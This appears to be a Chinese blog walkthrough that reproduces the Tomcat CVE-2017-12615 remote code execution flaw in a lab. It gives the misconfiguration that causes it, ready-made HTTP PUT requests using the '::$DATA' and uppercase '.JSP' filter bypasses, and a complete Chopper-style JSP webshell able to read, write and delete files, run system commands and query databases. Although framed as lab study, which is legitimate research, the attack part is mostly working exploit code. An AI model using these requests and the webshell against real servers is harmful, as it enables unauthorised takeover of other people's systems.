Tomcat CVE-2017-12615 远程代码执行漏洞

【漏洞编号】

      CVE-2017-12615

【漏洞描述】

       Tomcat 7.0.79,7.0.81版本存在远程代码执行漏洞,由于管理员的疏忽配置未开启PUT和DETELE方法只读。导致可以上传webshell文件,实现对服务器的控制。

【漏洞级别】

      高危

【漏洞复现】

A. 搭建实验环境

  • JDK版本:jdk1.7.0_80
  • Tomcat版本:7.0.79,7.0.81
  • 工具:BurpSuite、菜刀工具

B. 实验过程

1.创建实验场景
      打开Tomcat安装目录下的conf文件夹,编辑web.xml文件。 配置文件中添加readonly设置为false时,将导致该漏洞产生。配置为true时是设置为只读,禁用PUT和DETELE方法。


开启PUT方法可写

文档中关于readonly的说明如下,更改readonly标签的值为false:





        readonly
        false

2.构建测试用的POC
      由微软MSDN上关于NTFS Streams的一段资料https://msdn.microsoft.com/en-us/library/dn393272.aspx,获得思路。

All files on an NTFS volume consist of at least one stream - the main stream – this is the normal,
viewable file in which data is stored. The full name of a stream is of the form below.
::
The default data stream has no name. That is, the fully qualified name for the default stream for
a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA"
is the stream type.

      构建Request_POC

PUT /shell_sunird.jsp::$DATA HTTP/1.1
Host: 192.168.10.124:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15e93d0e1093ce-00d570b998b1b6-e313761-100200-15e93d0e10a60b; CNZZDATA1264347540=617394558-1505715371-%7C1505715371; JSESSIONID=BF4039CD5DAB813A18B40E3559945BF9
Connection: close
Content-Length: 16

sunird.com in DP
--------

      POC构建成功之后,使用burpsuite工具的Repeater功能,发送构建的Http请求包。可以见到在Response返回包中显示上传成功。


上传文件成功

      这里的Host要设置成Tomcat服务器的IP地址。最好的方法是先访问一下tomcat主界面,然后再找到那个请求。在原有请求的基础上做修改会方便很多。
      在服务器端查看文件,可以看到构造的文件创建成功。


服务器端Tomcat的ROOT目录

3.更进一步
      漏洞利用成功,可以创建完善的一句话木马实现对服务器的控制。根据测试POC代码构建jsp木马。
PUT /shell_sunird1.jsp::$DATA HTTP/1.1
Host: 192.168.10.124:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15e93d0e1093ce-00d570b998b1b6-e313761-100200-15e93d0e10a60b; CNZZDATA1264347540=617394558-1505715371-%7C1505715371; JSESSIONID=BF4039CD5DAB813A18B40E3559945BF9
Connection: close
Content-Length: 6235

<%@page import="java.io.*,java.util.*,[java.net.*,java.sql.*,java.text](http://java.net.*,java.sql.*,java.text/).*"%>
<%!
String Pwd="test";
String EC(String s,String c)throws Exception{return s;}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;i<%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>

和测试时一样,利用漏洞上传木马文件。

一句话木马

      上传成功以后,就要使用准备好的菜刀工具了。使用菜刀工具连接到木马,实现对服务器文件目录结构进行查看。

Tomcat中间件所在服务器文件目录

      使用虚拟终端输出服务器IP地址。


服务器终端IP地址输出

      7.0.79版本的漏洞利用过程就完成了。同样,7.0.81版本也存在该漏洞,利用的方法有一点差异具体的利用方法可见下文。


4.试试别的版本吧,巩固提高一下!
      在Tomcat7.0.81上实践实验,发现之前的方法已经失去了作用。服务器对以".jsp"结尾的文件进行了过滤操作,提交后会显示参数非法。

漏洞被修复不能上传

      但是不要担心PUT方法漏洞依然存在,可以尝试绕过。:)
方法1:
尝试提交".JSP"结尾的测试文件,提交成功绕过的思路正确。

更改文件后缀

访问提交的测试文件可以看到页面。上传成功!


访问上传的页面

      依据该方法提交木马文件,使用菜刀工具登录发现可以访问目录。但是无法使用终端,可见这个绕过的方法实现的功能不完整。


可以查看文件目录
不可用使用终端

      因为无法使用终端,上传文件到服务器的功能也受到了一定的限制。所以能不能找到一种更方便的操作呢?      答案当然是肯定的:)

      在创建文件夹时用户名中一些特殊的符号是会被自动删除的,比如‘/’、‘\’、‘?’等等。

方法2:
可以尝试提交一个带有非法字符的文件,构造新的木马上传POC.


绕过过滤

      根据返回包可以看出上传成功,生成的文件是".jsp"文件不用担心木马功能缺失。连接终端可以正常查看IP地址。


绕过成功,查看IP地址

注:本漏洞复现实验过程及截图均为作者所做。漏洞利用POC从网络获取后修改利用,侵删。
个人博客地址XXX,暂时没有==!欢迎访问

你可能感兴趣的:(Tomcat CVE-2017-12615 远程代码执行漏洞)